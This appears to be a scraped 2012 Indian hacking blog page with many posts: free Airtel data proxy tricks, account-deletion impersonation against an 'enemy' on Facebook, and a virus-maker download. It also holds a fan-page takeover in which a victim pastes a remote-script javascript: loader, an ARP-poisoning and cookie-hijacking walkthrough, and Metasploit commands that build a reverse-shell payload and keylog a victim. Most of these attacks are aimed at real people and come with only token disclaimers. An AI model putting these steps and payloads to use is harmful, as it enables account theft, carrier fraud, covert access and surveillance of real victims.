Latest 2012 Airtel all india working free 2g 3g gprs trick

Hello users, 
We are back with fatest updates on latest 3g hacks .
We have some good news for Airtel users,
Airtel has now unblocked all the restrictions on the blocked sims.
All the tricks are working agin in upeast and northern region and almost all over india, including states like Haryana, Delhi, Punjab,M.P.,Rajasthan, H.P. etc,.
Now we can surf and download for free using the below procedure.

Notice: Most of the latest tricks get blocked soon after getting released on Crackohack!

So we have added a addtional security step to protect this trick !

for mobile you have to make new settings and for pc you have to do changes in browser.

So here is the trick for both mobile and pc:

• Download any of handler below

Opera Mini Next 7 Beta for Java,Symbian,Android,Blackberry

UC browser 8.3 for AirTel Idea Reliance and other operators.

• Or open firefox 
• Use any of the latest proxy provided  by us below: 

New proxy may 2012 airtel free gprs
Proxy Tricks (Crackohack Collection) | Crackohack

Super fast Proxy access secure ssl sites facebook, gmail, youtube 

Proxy to browse ssl sites on airtel | Crackohack 

Latest 2012 Proxy List 9500+ (100% Working) | Crackohack 

AIRTEL FASTEST PROXY FOR DOWNLOADING & SURFING 

• Now use these proxies in mobile browser or pc browser with port :80
•  Here is  the main trick:  use any of the homepages given in the attachment file
•  Visit this link for downloading Free opening websites or realhosts :  http://adf.ly/8frNR   UPDATED LINK WORKING !
• Now using this trick you can download and watch movies online , download games ,softwwares and much more with 3g speed! 

Read More

Boost Up Speed Of Opera Mini Internet Connection

Hello Friends ,

Do you ever faced slow internet connection on your mobile ?

If Yes! then we have have something interesting for you .

Most of us would be using Opera mini browse for its speed, pc like view and compatibility, but sometimes it also get sow due to server load and there are errors in web pages displayed.

But, we have a tweak or a trick for you , with which you an fasten up your Opera mini , with    turbo speed up technology !  

 

• first of all download Any of the opera mini from below 

•  Latest Opera Mini 5.1 Android HUI May 2012 | Crackohack

• airtel hui trick Opera Mini 6.1 and Opera Mobile 11.1

 

• Then open and initialise the browser,

• After installation, goto address " http://redir.opera.com/turbo"

• Now start browsing the web, and we bet you will feel the difference in speed and fluidity in connection speed, say thanks to turbo technology !

Read More

Unlock AT&T iPhone 4S Without Losing Jailbreak Using SAM

You can now unlock your AT&T iPhone 4S without having to lose your jailbreak, thanks to SAM (Subscriber Artificial Module). Right now, this is the only working method for unlocking a jailbroken iPhone 4S on AT&T, so do not bother trying it out with jailbreaking tools, such as redsn0w. SAM basically allows you to activate your iPhone using legitimate certificates generated through iTunes. Read on after the jump to understand how SAM works and how you can use it to unlock your iPhone 4S in no time!

As explained in an earlier article on fixing iMessage/FaceTime & Push Notifications On Hacktivated iPhone 4/3GS, “iTunes activates your new iPhone using your official (supported) carrier’s IMSI, taken from the SIM card. When you hacktivate the device for use with unofficial carrier, this process is bypassed by running a daemon constantly in the background, fooling iTunes into believing that the device is already activated. While there are numerous methods and tools available for hacktivation, SAM, a free package on Cydia, spoofs a fake IMSI, making iTunes believe that the device is running on an official carrier’s SIM, thus making the program generate legitimate activation certificates.”
Now that you understand what you’re dealing with, let’s get on with unlocking your iPhone 4S. Stating the obvious, you will need to contact AT&T and inform them of your request to unlock your device, and only then should you proceed with the instructions below to unlock your iPhone 4S.

Disclaimer: Please attempt this guide at your own risk. AddictiveTips won’t be responsible in case your device bricks or damaged in any other way due to this method.

Instructions:

1. To begin, head over to the Cydia Store and add the following repo to the sources: http://repo.bingner.com  
2. From that repo, install SAM and go back to the Settings app.
3. Hit the deactivate iPhonebutton and then connect it to iTunes.  
4. iTunes will now activate your iPhone and will unlock it in an official way.

That’s it! You’re good to go with an unlocked iPhone 4S! Those with non jailbroken devices can simply tap reset all content and settings and continue to connect the device with iTunes to activate the phone and unlock it.

Read More

Airtel Latest home page Hack Free Internet 2012 3G

Hello friends,
As we all know that fb.me is not working in some states. Now don't be worried...
Here Crackohack team giving you some more ip (Use it as a Home Page)
and do try it in your state.. N share which one is working in your state...

1. 63.236.44.243

2. fb.com

3. gclub.in

4. airtelfb

5. airtelworld.com

6. 0.facebook.com

7. 59.160.229.40

and westbengal users good news for you....
live.airtelworld.com back again.
now HP=live.airtelworld.com and it will work.
and also use

motennis.com

mocricket.com

mofutbol.com

How to Use AirTel Proxy in Handlers

• Make AirTel your Default Internet Settings
• Download a Handler [ Download Opera Mini Handler or Download UC Browser Handler ]
• Open the Handler
• Select  Proxy in Proxy Server
• Select any of the Proxies Provided Above
• Access free Internet
• List of Latest Updated Handler of Opera Mini and UC Browser are below

List Free Latest Handlers for Free internet on AirTel

• UC Browser 8.2
• UC Browser 8.3
• UC Browser  8.0
• Opera Mini 7 Next

Note: Use this Trick @ low balance. below 1 Rupee

Subscribe us get the updated service of AirTel proxies

Read More

How To Delete Your Enemy's Facebook Account

How To Delete Your Enemy's Facebook Account

This tutorial is education purpose only, once deleted profile can never be recovered.

Follow the steps given below:

• Victim’s profile link ( you can get it easily )
• His/Her Email which he/she uses to sign in
• His/Her birth date which he/she has used in the profile
• Make an Email ID on gmail or yahoo with the first name and last name same as on victim’sfacebook profile.

Click here to start:

• Now you will get this screen

• Enter details. In the place of ‘ email address where you can be contacted ‘ enter the fake email you created.
• You will get an email on that ID in which facebook people will ask your problem. Reply to them that you are (put victim’s name here ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account.
• After 2-3 days you will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don’t have access to it. And repeat what all you wrote in first mail.

Next Day or Same Day you will get an Email that your account is disabled. 

you may also read :

• How to Get Back Facebook Banned (Disabled) account

• 20 Facebook Tips/Tricks You Might Not Know

• Hacking Facebook Account Username and Password

Read More

Crackohack Special virus Maker 1.1 free download

Crackohack Special virus Maker 1.1

 

Hi all users, This is a cool virus maker we're posting here, and brought  to  you exclusively  by us.

You can also check another tutorial on :How to create a Computer Virus?

And 

                               How to make Powerful viruses on your own?                      

This is what our authrors say about it.

We decided to make a custom virus maker because I don’t trust all the other virus makers that are out there on the net. I think it took me about 4 hours to code this. If you are wondering why it took me that long: it is because I used a new theme and new components, and I’m still learning how to use them properly.

Video:

Download:

Download Virus Maker Now!

Virustotal:

Click Here for tutorial and Help !

Read More

FaKe SMS Sender with account Creating Tool (Free)

DOWNLOAD

Read More

Airtel Free GPRS Trick April 2012, Airtel Free Opera Mini Trick 2012

hi friends i hope you are regularly visiting our website, all proxy working tricks there is new one more included  in latest proxy list . we are found new proxy servers  for fast access  

Here Are Some New Proxies For Airtel Default Browser, With Resume Downloading.

These Proxies Are Work With 2G,3G Both Network.

*****Latest Airtel GPRS Trick April 2012*****

1] First Create New Settings In Your Mobile 

APN:- airtelgprs.com

  

Proxy Adress:- 141.000.011.253

  

Port- 80

2] Now Open Opera Mini Handler And Use This Settings:- 

Put Proxy Type- Http

Put Proxy- mocricket.com or fb.me

Just Save This Settings And Restart Mobile.

Now Access Free GPRS On Your Mobile.

Please Comment If You Like This Trick.  

Read More

Airtel Free 3G Gprs With Opera & Uc RealHost Trick April 2012

Now you can also enjoy real host trick for airtel free 3g internet for unlimited downloads and surfing. Its most easy gprs trick for Airtel I have ever found. You just follow procedure properly and Enjoy unlimited free 3g for airtel in April 2012.

Hope you also enjoying: Airtel Free 3G Internet 2012 Big File Downloading proxy

Trick:

>First Download: Opera mini 65 or  Ucweb 8.03 hui202 by trickerguru.com.zip 

and open it. after opening in Handler menu...
 

>Just go down and in proxy type select...
Real host

And in proxy server enter this address...
Fb.me
or
125.21.241.77/d
or
live.airteworld.com
 

Now u save it and let the opera initialize. And use mobile office setting default...
Now u see its working for free and downloading at 3g speed too.
 

Note-use at low balance.

Enjoy !!!

Read More

Free latest airtel 3g gprs trick april 2012

hi friends i hope you are regularly visiting our website,

all proxy working tricks there is new one more included 

in latest proxy list . we are found new proxy servers 

for fast access

#instructions:-

step1:create a new gprs/internet setting

apn:airtelgprs.com

proxy:lodgeus.com 

port:80

HP:fb.me

  [proxy is 100% working and testing]:)

                enjoy :)

Read More

OperaMini Free Airtel Gprs Tricks April 2012

Hello To All Friends After My Super Popular Trick

Optimizing Internet Connection Using Internet 

Cyclone - Increase Internet Speed in Windows

. Our Team Will Tell You About Free Gprs Trick April 2012 on Airtel . I am give you Free Airtel Gprs Tricks . How To Hack Airtel Gprs Using OperaMini ? Ok Let's Follow Some Few Steps For Do This .

1. First You Need Create New Setting In Your Mobile Phone

Apn - airtelgprs.com

Proxy Address - 141.000.011.253

Port - 80


2. Now You Open Operamini Handler And Use Following Given Below Settings

Proxy Type - Http

Proxy - mocricket.com Or fb.me

That's it Now You Are Done .

This Trick Are Already tested and working fine in rajasthan . Please Let's Check in your State Also

Read More

Download News Hunt hacked handler mod for Airtel 2012 March-April Trick .jar [Latest Trick]

After Uc Browser Moded for Airtel, We are here with  News Hunt ReModed and hacked For Airtel. This software is designed to enable reading all Indian Newspapers with latest news in the different regional languages.
New Hunt Supports reading newspaper in Many regional Langauges and also in English.The languages supported currently are, Hindi, Bengali, Punjabi, Gujarati, Marathi, Kannada,

Read More

Download Latest Uc Browser 8.2.0.132 hacked handler mod for Airtel 2012 March Trick.jar [ updated ]

Our Previous Post was About Google Translate Java Hacked for Airtel.We hope all of you like it. Through E-mails and through comments many people said that they want a UC Browser Hacked for Airtel.
Recently Uc Mobile team released a new version of Uc Browser. That is Uc Browser 8.2.0.132 . We are Remoded the Uc Browser Handler Mod with Free Airtel Gprs. This trick is tested in Kerala and it was

Read More

How toHack Facebook Fan Page (EXCLUSIVE AT CRACKOHACK)

Hello guys! after receiving a good responce from you i am posting a new trick here at crackohack.in, Well it will tell you about a new hacking technique and also will increase your knowledge so that you may not become victim of such hacks, But Always remember:

Note: Never use these tricks to harm any innocent, Just increase your knowledge and we will not be responsible for any harm caused.

The purpose of this trick and hack is to attack a fan page by fooling the admin by social engineering, I saw some people becoming victim of this, So i decided to teach about this hack to my loyal readers. Don't forget to share this with friends.

Things we shall need:

1. Facebook page hacking exploit.
2. A free hosting.
3. A key or script to run that "Facebook page hacking exploit.".
4. Your facebook email id.
5. Brain ( A bit ;) )

I will try to be simple, but if you don't get anything then kindly ask at comment below.

1. Facebook page hacking exploit:
Download this exploit from the link below, Complete the survey and you will get this exploit for free.
                                           Download script from here                                   

Now, After downloading it you will get key inside it also, and also the exploit, First we have to edit it,

a) Editing the exploit:
First of all see you facebook email id which you used to signup at facebook, see pic below thats the pic of exploit:

Now change the highlighted id to your's facebook id, Above its, bhupinder9dec@gmail.com
2. Get free hosting:Well t35 and 110mb won't help you in this hack :P better go to 000webhost.com and 0fees.net.


Upload the exploit and i recommend change its name from pagehack.js to fanbooster.js or something more attracting.

3. Using the exploit by Key or script:
Use this script to complete this attack. Now the main thing is social engineering,  its up to you that how you give him this script or key, Well Change the following part in the key to your own script path:

javascript:(a = (b = document).createElement("script")).src = "//http://dl.dropbox.com/u/67513625/fanbooster.js", b.body.appendChild(a); void(0)

Change this to your hosting , and also change the exploite name in this key if you have changed it while uploading as suggesting.

Tip: Encode this in ASCII format, Victim might not know what is this.

Now, Give the key to victim (He must be admin of page) and ask him to paste this in browser address bar

Tip: Tell him that it will make your page safe, or something else like attracting

When he will put this key in address bar and thats it you will get a notification that you are admin of his page now.

Enjoy cracking and hacking, But don't hack for bad cause, We  will not be responsible

Read More

How to hack Facebook via Sniffing ?

How to hack Facebook via Sniffing?

Hi all users, after receiving your mails that most of facebook hacks doesn't work anymore we have searched and tested and posted some of most popular facebook hacking techniques but still  I think doesn't work for you so finally we've found this technique working 100% for hacking facebook and today we're here to let you know how to do it. So you want to hack Facebook, eh? Before we begin learning how to sniff and start ARP poisoning, let's first begin with this: this tutorial was designed for educational purposes--only! I take no responsibility in whatever damage this may cause to those who wish to participate in this act of hacking! That being said, if you still wish to continue in learning how to get into someone's Facebook without them knowing, proceed along.

There are a couple of terms you will have to know before we begin. This is so that you don't find yourself scratching your head midway through this post wondering what the @$%# I'm talking about. Please understand the following terms and they're respective definitions before proceeding.

• Cookie:  A cookie is just one or more pieces of information stored as text strings on your machine. A Web server sends you a cookie and the browser stores it. The browser then returns the cookie to the server the next time the page is referenced. Cookies are essentially utilized so that the website can remember certain aspects of that particular website so that when you return it loads the page faster.
• ARP Spoofing/Poisoning:  ARP stands for Address Resolution Protocol and is a telecommunications protocol used for resolution of network layer addresses into link layer addresses, a critical function in multiple-access networks. It's the "guy" behind the scenes that stands in the middle of all the network traffic, takes in the requests of other computers on the LAN, and returns valuable information/answers. How do you think you get your IP address when you look up ipconfig in CMD? Your computer sends out a request to extract its IP address and the ARP essentially gives you the IP address for your computer. The act of "spoofing" or "poisoning" the ARP, as you probably can already tell, is a very dangerous protocol. By doing so, you are enacting what's called a "man-in-the-middle-attack", MITM for short. When you poison the ARP of a computer within a LAN, you are making yourself the ARP. In other words, all the requests the computers in the network make come directly to you and the answers go directly from you. More on this later.
• Packet(s): Packet, or packets, are a formatted unit of data carried by a packet mode computer network. They contain literally a million variety of information and provide useful methods in transmitting/receiving requested information. For example, let's take a look at sending an email. On the Internet, the network breaks an e-mail message into parts of a certain size in bytes. These are the packets. Each packet carries the information that will help it get to its destination -- the sender's IP address, the intended receiver's IP address, something that tells the network how many packets this e-mail message has been broken into and the number of this particular packet. The packets carry the data in the protocols that the Internet uses: Transmission Control Protocol/Internet Protocol (TCP/IP). Each packet contains part of the body of your message. Hopefully this gives you a general idea of how packets work and what they provide for both your computer and the internet.
• Sniffing: Sniffing is usually implied to sniffing network packets. Packet sniffing is the act of eavesdropping on another computer's packet transfer and capturing (saving) those packet transfers for analysis. Though this sounds malicious and wrong, packet sniffing is used widely around the world today for a number of beneficial reasons. But yes, you are correct, just like everything else there are both good and bad intentions for sniffing. An analysis of "sniffed" packets can often times to be used to pick out abusive/malicious acts within a network. An analysis can also provide the "sniffer" to pick out what the slave has been doing and what kind of information the slave's computer has been sending/receiving. Again, just a general definition but you get the picture.

Please read through the definitions and familiarize yourself with the terms before asking what certain things mean here. You can't expect to know every and anything without doing some homework. Trust me, knowing these terms will not only save you time but also give you the benefit of becoming more knowledgeable about basic network definitions Victoire

Software

The following is a comprehensive list of the software you will be needing for this practice. I've given the links to their home pages where you can download the software for free.

• Mozilla Firefox: http://www.mozilla.org/
• Web developer add-on for Firefox: https://addons.mozilla.org/en-US/firefox/addon/web-developer/
• Cain and Abel: http://www.oxid.it/cain.html
• Wireshark: http://www.wireshark.org/download.html

Sniffing Your Way In

Now that you're generally familiar with some basic network definitions and have downloaded the required tools to effectively sniff packets, let us begin. Go ahead and open up Firefox and log into your Facebook account. You should be able to see the "cookies" option in the upper-left corner of the toolbar. Click on that and select "View Cookie Information".

You should now see a collective group of information all in regards to the cookies saved on your computer for Facebook. The main cookies are the c_user cookie (which identifies a person uniquely) and datr cookie (which contains important information for the specified c_user). Our goal in sniffing into someone else's Facebook is to trick the browser and the computer into thinking that we are someone else. How do we do this? By manipulating cookies to disguise ourselves. Essentially we are swapping our actual Facebook cookies to that of the slave's so that when we log back into Facebook, it will think we are the slave rather than ourselves. Not too hard to understand, right? Blink

Go ahead and close out of Firefox for now. Next, go and install Cain and Abel. Throughout the installation process, the setup wizard will ask if you want to install the packet driver WinPCap--go ahead and install this. Once you have successfully installed Cain and Abel, open the program. Now follow these steps exactly:

• Click on configure on top and select your Network card. Mostly its the one with an IP address Tongue.
• Next click on the start/stop sniffer on top as shown below in green square.
• Once you start the sniffer, goto the sniffer tab in Cain, right-click and click scan MAC address as shown below!

Depending on your computer and your network population this process can take a couple of minutes. Once it's complete, however, you should be able to pull up a list of computers on your LAN. One cool thing you can do here is right-click one of the computers and find out the computer name. Now it's time for the attack! What was the name of the attack again? Anyone? Did you forget already? Ah, yes, the MITM attack!

Again, follow these steps accurately to effectively spoof the ARP :

• First Click the APR tab below in cain.
• Click the white screen in the top frame
• Click the blue plus on top.

You should get a list of all the devices on the left and a blank screen on the right. In the left screen you should select the router IP. And in the right box, select the computers you want to target. To be safe its better to target one computer. But if you want some real fun then select all the computers on the right frame Hehe. Press "Ok". A caveat in selecting a large amount of computers, however, is that your computer may not be able to handle all the network transmissions and therefore lose some packet captures. Also keep in mind, however, that if someone is working in the router or is monitoring/analyzing the router and actually knows what he/she is doing, they could immediately detect that you are ARP poisoning the router. So be careful! You can get caught.

All the computers should have populated the top-frame. Now select the whole list and click on the nuclear button (top left of Cain, bolded box in the picture below).

And you're done! You've successfully poisoned the ARP of the computers you've selected and you are now the "middle-man" between your slave's computer and the router to the internet. But wait just a second--we can't get into the slave's Facebook just yet! All we've done so far is established ourselves to be the "middle-man". We have to now capture some packets, swap cookies, and voila! We're in.

Now we will open up Wireshark. Follow the steps below :

• Open up wireshark
• Go to "Capture –> Interfaces" in the top menu and select your interface. It’s usually the one which has an IP address and a certain number of packets flowing through it.
• Next go to "Capture" and click on "Start".  

It should look something like this.

This window has all the packets sent from the slave’s/victims’ computer to the router and all the packets sent from the router to the slave.

Next in the filter type “http.cookie contains datr”. You ask why? Because, when a user logs in to facebook, he is given some cookies which is unique to him. If we replace our cookies with the slave’s cookies, we can login to his account as then facebook wont know the difference.

 

After filtering the cookies out, right-click on any one of them and click on "Follow TCP Stream".

In the TCP stream look for the line "Cookie: ( and all cookie names)". If it doesn't show up, select some other packet in Wireshark and click on "Follow TCP Stream" for that particular cookie. You can see the source IP and destination IP in Wireshark. So if you have more than one source IP, then you know you have the cookies of more than one account on your LAN. This is what I got when I did it.

 

You now have the slave's cookies for his/her Facebook. The main ones we need to focus on are the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie. Now open up Firefox and go to Facebook. If you're logged in, log out so that you're at Facebook's home page. Click on the "Cookie" option in the toolbar (as like before) and do the following in this exact order. 

• Clear session cookies.
• Delete domain cookies.
• Delete patch cookies.

Note :-
If you don't do the steps in that same order, this will not work!

Note :- Once you do this, reload the Facebook page (http://www.facebook.com). This is to ensure that you are loading the Facebook page clean without any pre-existing cookies.

Now login to your account with your username and password. After logging in, click on cookies in web developer add-on just like before and click on “View Cookie Information”. You should see all of your Facebook cookies now. Any ideas what we do next? I suspect you know by nowOui.

Click on “Edit Cookie” for each cookies there and replace the cookie value with the value you got through Wireshark. If you didn't get all the cookies in Wireshark, it's OK! But mainly, you should look to replace the datr cookie, c_user cookie, lu cookie, sct cookie, w cookie and xs cookie.

After you have swapped cookies, go ahead and refresh the page. Voila! You should now be logged in as your slave rather than yourself. Congratulations, you have successfully "hacked" your way into someone else's Facebook! Again, please keep in mind that this only works for computers within your LAN. So if you're at home, you can only get into the Facebook of people who are connected at home. No, you cannot hack into the Facebook of someone across the worldNon.

I hope you guys have enjoyed this tutorial! Please feel free to leave me any questions below or PM me with any issues you have. I'll try to respond and reply at my soonest convenience.
If you liked this tutorial then +1 us on google+ and like our facebook fan page to get latest updates like this!

Read More

Metasploit Tutorial - With an example | Exploiting the vulnerabilities

--- The Metasploit Framework ---

Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.

If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.

Now, have you ever wondered what someone can do to your PC, by just knowing your IP. Here's the answer. He could 0wN you, or in other words , he could have full access to your PC provided you have just a few security loopholes which may arise cause of even a simple reason like not updating your Flash player last week, when it prompted you to do so.

Metasploit is a hacker's best friend, mainly cause it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.

The topic Metasploit is very vast in itself.However, i'll try keeping it basic and simple so that it could be understood by everyone here. Also, Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).

In this tutorial, i'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.

Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (may seem boring at first, but you must be knowing them)

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.

Exploit: A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.

Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.

Payload: Actual code which runs on the compromised system after exploitation

Now, what Metasploit IS?

It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, also it can be used to write our own 0-day exploits.

METASPLOIT ANTI FORENSICS:

Metasploit has a great collection of tools for anti forensics, making the forensic analysis of the compromised computer little difficult. They are released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.

Metasploit comes in the following versions:

1. CLI (Command Line Interface)

2. Web Interface

3. MSF Console

4. MSFwx

5. MSFAPI

I would recommend using the MSF Console because of its effectiveness & powerful from a pentester’s P0V. Another advantage of this mode is, several sessions of msfconsole could be run simultaneously.

I would recommend you doing the following things in Metasploit, on a Backtrack(system or image), avoiding the windows version of the tool.

For those of all who don't know, Backtrack is a linux distro especially for security personals, including all the tools required by a pentester.

Download Backtrack from here. You can download the ISO or VMware image, according to the one you're comfortable with. If you have 2 access to more than 1 system physically, then go for the ISO image and install it on your hard disk.

Let the Hacking Begin :

Open up backtrack. You should have a screen similar to this.

The default login credentials are:

Username: root

Pass: toor

Type in

root@bt:~#/etc/init.d/wicd start

to start the wicd manager

Finally, type "startx" to start the GUI mode:

root@bt:~#startx

First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:

root@bt:~#ifconfig

It would be something like 192.168.x.x or 10.x.x.x.

Have a note of it.

Now,

Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole

You should now be having a shell something similar to a command prompt in windows.

msf >

Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Open another shell window (”Session>>New Shell” or click on the small icon on the left of the shell tab in the bottom left corner of the window)

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip” LPORT=”any port you wish” x > /root/reverse_tcp.exe

Your local IP is the one you noted earlier and for port you could select 4444.

(Everything has to be entered without quotes)

You should get something like this:

Created by msfpayload (http://www.metasploit.com).

Payload: windows/meterpreter/reverse_tcp

Length: 290

Options: LHOST=192.168.255.130,LPORT=4444

root@bt:/opt/metasploit3/msf3#

Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.

Now open the 1^st shell window with msfconsole in it.

msf >

Type the following:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.255.130

LHOST => 192.168.255.130

msf exploit(handler) > set LPORT 4444

LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.

And now, you have set the meterpreter to listen to you on port 4444.

The last step you have to do now, is to type in “exploit” and press enter,

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.255.130:4444

[*] Starting the payload handler...

Now, the payload is listening for all the incoming connections on port 444.

[*] Sending stage (749056 bytes) to 192.168.255.1

[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this

meterpreter >

Type in ps to list the active processes

meterpreter > ps

Search for explorer.exe and migrate to the process

meterpreter > migrate 5716

[*] Migrating to 5716...

[*] Migration completed successfully.

meterpreter >

Type in the following:

meterpreter > use priv

Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,

Jus type shell

meterpreter > shell

Process 5428 created.

Channel 1 created.

Microsoft Windows [Version 6.1.7600]

Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

You would now be having a command prompt,

Type in whoami, to see the computer’s name of victim :

C:\Windows\system32>whoami

whoami

win7-pc\win 7

C:\Windows\system32>

Let’s suppose you want to start a notepad on the victim’s computer.

Type in:

Let’s say the victim has typed in anything on his computer.

Just type exit, to return to meterpreter.

Now type in keyscan_dump, to see all the typed keystrokes :

meterpreter > keyscan_dump

Dumping captured keystrokes...

GaM3 0V3R

P.S.: The above information is just for educational purposes only. You should test it against the computer you own.

Read More